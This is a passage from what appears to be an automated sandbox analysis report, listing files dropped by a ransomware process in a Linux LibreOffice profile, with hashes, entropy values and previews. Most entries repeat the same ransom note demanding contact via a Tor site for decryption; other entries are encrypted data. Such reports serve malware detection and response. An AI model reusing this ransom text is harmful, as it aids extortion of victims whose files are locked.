                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/shared/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/tmp/extensions/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/tmp/registry/com.sun.star.comp.deployment.bundle.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/tmp/registry/com.sun.star.comp.deployment.component.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/tmp/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/backenddb.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):367
                  Entropy (8bit):6.142813546551789
                  Encrypted:false
                  SSDEEP:6:1Vs/J6xyjIVEgE0z7CZyKfiiWfqV1zmhOO/EUyp6XcVag7u53M4O:g/oFVfnCZyOGO2DcUBeQq
                  MD5:A986E1BA403C76CD1BB90A1541C98F3C
                  SHA1:124AFB35FAB05D60736DCA2897973D7D655BC61F
                  SHA-256:2454FD875870554EA857AF9FC3FC1EEA7E0541147618B9E2F3D9A0F439115594
                  SHA-512:22E8442587A92312C8B488515D621B814400BCFE7CAF29B968710F8104267AF0075C3C789E375D44F99B6E80EF78DB67AE917CB0231C9F801629564915ED4682
                  Malicious:false
                  Reputation:low
                  Preview: .v..x.N.e.7.:...Dc.%C..@K..h...|/...%...4..e.X...%..Bc|...2v.......A..A......F..... vT....o+.f.a#KF..g.../.fxN|....+z.."f+..(....<..:..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................y..k.v......].*U...Q&`\.]1...> WTM...2.@..V..........o.Z
                  /home/user/.config/libreoffice/4/user/extensions/tmp/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/tmp/registry/com.sun.star.comp.deployment.executable.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/tmp/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/backenddb.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):349
                  Entropy (8bit):6.0743903807441395
                  Encrypted:false
                  SSDEEP:6:Kz+dNNINs+xWkwWgrN3497CE11zmhOO/EUyp6XcL5UPo7bZsx74j+tl9n:S+NE4NcCI2DcUBtPo7bS+j+X9n
                  MD5:EC09BAF8CD38308423111C858AAFF7D7
                  SHA1:DAF12393E90D1DC3163F269E2C265180C5EC0294
                  SHA-256:32DC6342984E390AF78BC370C821AC9CE58F450476F2B2F1A45C311FCFD068CB
                  SHA-512:813DD0CC62E49CE84E31064C2AC0F1CF3D58D74292AA132A1FE7B437DDEAB9AB21D402920944C6558F8AAA721626A4372ADEA282132DAB4FDB28842CAF67BFAD
                  Malicious:false
                  Reputation:low
                  Preview: .;.N..H.......,q..].z..._.....E.b|........S..".2.E+4L"<.nuf....Q....g.......P.......T....."mQ4..ki..9..B.>h..b.....h.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................]..b.We.p.s}'<.L......P!....K*D...%..~.xg............2
                  /home/user/.config/libreoffice/4/user/extensions/tmp/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/tmp/registry/com.sun.star.comp.deployment.script.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/tmp/registry/com.sun.star.comp.deployment.sfwk.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/tmp/registry/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/tmp/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/gallery/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/gallery/sg30.sdv
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):2280
                  Entropy (8bit):7.826722346705084
                  Encrypted:false
                  SSDEEP:48:n82gY8Ip4vCphbaDMld9Of6dHfMqRhpmytGy8/xv494aDcgZ:npgU4vyh+DMLndfrRhxixU/DD
                  MD5:C6EA8D16D169E12BAD79AE39DD6A4F79
                  SHA1:EFC652AAB5740154BA0446AD6D645A13EE326211
                  SHA-256:84730091DA367A343DBF691FEF9114A588A2A0689F4DDE86526394127FBC38A1
                  SHA-512:39224252AB7DFBCC549E7AFCB04ADE6782579EFA6E7499CD9F077D03F10E69D4FBBAA5F506C203EBA6E6F160EEDC29BEB5C0B20ECC1778ED4A41D7E6E7D9330C
                  Malicious:false
                  Reputation:low
                  Preview: ...;b..U...U.+.+z.e..aJyc~v.5.Z."8.@0-0.f...68?I.<..q.rC.......Yr;.DP.,.Y..=........}.....f.?zv.b.J./.v.....>...,...6.e.F..#..`Z,..".C.).G.Q.2.L6.>...lW.".YwU..dNx.,..=..H.."E.7n..q.E\....>.F.q&.?l....5AK.KD....."c<>..)7k...gRJk...5b.%..._p.....h..j..... ..x.y.'?....|....~.?{[_I...&..or0..ma..."......ne..Tbu....j%.I.qy.4.:.:..`q..]..1k.c...L.$..b~_.}..i.E.....B-...=...t.........>.q.].kc...f..V._..oYw&..u3....).o....?ws4.....0...{.].w.M.Qu-......J&.<i.. I.3j.^..A2.L....vG.2......0.u...$...........Q.0...4Z...0^....%.Dd.....W.r^pC....).m.../../.........hi..^...y..2. .I...m......9Z....k....V..SB..$.......(..../.....^.&DE+....0..5.."YNh.x>;.[$N.E..1..)pq.v.2X...G......5.l.8.2...._*...':[@...KZw|..eW=.~..`.(...vn-...1jhe.*.E.q..^.__.i..D`..6..[..6...~..~.*....a.....?.O..ow..<\.4....I........U.......B..m...1iy...g[..{c..K..*"Z.vR.~aR*...y%U...%A|1..5..iy.y.6.....i...S.{..O..M..P|.~..D.`..`.....5p.H.7..aGD...l..XG..?......[.e...L>.E.&..l..(..._./].Hpe.[9...S....z......h.t.....9....>.|W(`.yC.q.
                  /home/user/.config/libreoffice/4/user/gallery/sg30.thm
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):797
                  Entropy (8bit):7.293105115498416
                  Encrypted:false
                  SSDEEP:12:oXn0nX9LjjeJhZD/eq/MjjyxREAxVREWn7GqlwhC7tKxtxTZS2DcUBfF9Iq:ioJeJPD/FMCbEZwwhsA/VS2Df59
                  MD5:5A9635D5007F8F6B810D86B83B4061ED
                  SHA1:2F744FA0F948D5CA2ACEEDA945C5F88176D98339
                  SHA-256:A6F51665857312F67CD05274FC4707D0B0352F1DF8E7C201623BABDF398306BC
                  SHA-512:957F3A300CD4DEEB6E871FC1F24393F3FF4CD6B590414E2CEF6F7E0F82F0406A52104982B3018A8B3002998F1592E824D7AF6BDCF691E72B27A9FB9A584E0B3E
                  Malicious:false
                  Reputation:low
                  Preview: ...h.4*Y..|e.....$.M......|..s.`.......}......f...O...T6Q....'9.j..E..`M..c........#.il2Dd..B_5..<.#*....31 zx.......,.>.F......cUiP...Ml\...8...=+u...[Y...) .T.]U.4.1.L(.4.....a...x....x.0.)x....v...{..Ke.........{..S......v..U..JU.3......*......c..%.L1R?......E....8.;. .Q...T..2...}........"..........2.......l.u.....F...B..S...m...BL...&..;........s9.........YG.{.....Xb..j...^m.gy.;......x....)......-..q.k(....h....5>...;....L+G..R%T'eT.]t.....Td..H.2TZ...[:.*.x..W..C.U.}..9#..E..K...h[2iE.C.....su ..o..mbI.u.....H..ad.../|lGT....P..../.......8.n.2iI..@.&.d%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................p.T..t.+8d.#_.Q.>=.)..J.).....|....(..._.[1...........t
                  /home/user/.config/libreoffice/4/user/psprint/pspfontcache
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):55981
                  Entropy (8bit):7.996181176116073
                  Encrypted:true
                  SSDEEP:1536:nJ3zEvjGzQ727sS8YDOYs2oTbnG/82se4RBRuA:NzEbN2qYaY8+/8U4jgA
                  MD5:8AB0492F1B0298F728353942A465EB30
                  SHA1:CEB7E69D1B89A1BE0E57E33E2A15F48CE5D51946
                  SHA-256:74697395DEB3F334FB924D94E0C8C0C2FC61C5C087A8962E9A493803CB090414
                  SHA-512:7886292973349ECDCCB5E17815D8083293609B402B77C38AC4A0D3D725851A4AFE9157080F1177924FE8FBBBCCB8A62ED7DE8383FD50F2BE6F955BF137354B96
                  Malicious:false
                  Reputation:low
                  Preview: ..R).7L.&0..U.2]...6.?.....1....(..P#........(..;.....1.t.,dS~\.U=.q.`....F...0.......B<e.zU.d.....8...6.$.g...]..$<.)..d.......|]......9...K..:.Q.sN.....=.9w..~.hF.N..qM..O[).>.o.f.H'?.~S........6..g/..d|..Z..m.5..).[.4..8./.n)........K..*..(k...J2'd.t......Q".P...*....MC.pC+uA.1...)<W.....2[i.;............ 8.Zy........*..P......Q&(d...^...?UrW..0Y>..9.U...%.x.N.t'..x.|.........2k.Q.,..t.E!....z.$}..%..G...I........FP..U.A.C,......i...6y.....i.......:.Y...y_....^...>..vI..? ..%R.p.b...l.N...Q....8q;.f....(.[/.....%..1....."x....gN4..t..9.i.U...c].....W....t..S.-~..~...f...-iN^U...q/*7.\....2/.C....P1.U.......E+O.:*.....<)[M..[%1F."xlu.NE<..u..U.~W..cr..L6C.Q..Pn0.>....../..~...md$....'......J...}..*7......e........./..a.......p...A..R.B."..O..X..-..M...T?...{..Q..%...i..a.......GEe=...d..<..s..|..........X....G<.._zG..?....p..I......$p.E......0.qp*Y.T.....<....b.....d.U..m.....9..c.T6.mN...O`...).C.q.......v[..Q2...U....<U...%...a@.....kD...<....U`...G...E._........\..y....+..._B...Ws
                  /home/user/.config/libreoffice/4/user/psprint/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/registrymodifications.xcu
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):56618
                  Entropy (8bit):7.996172489427702
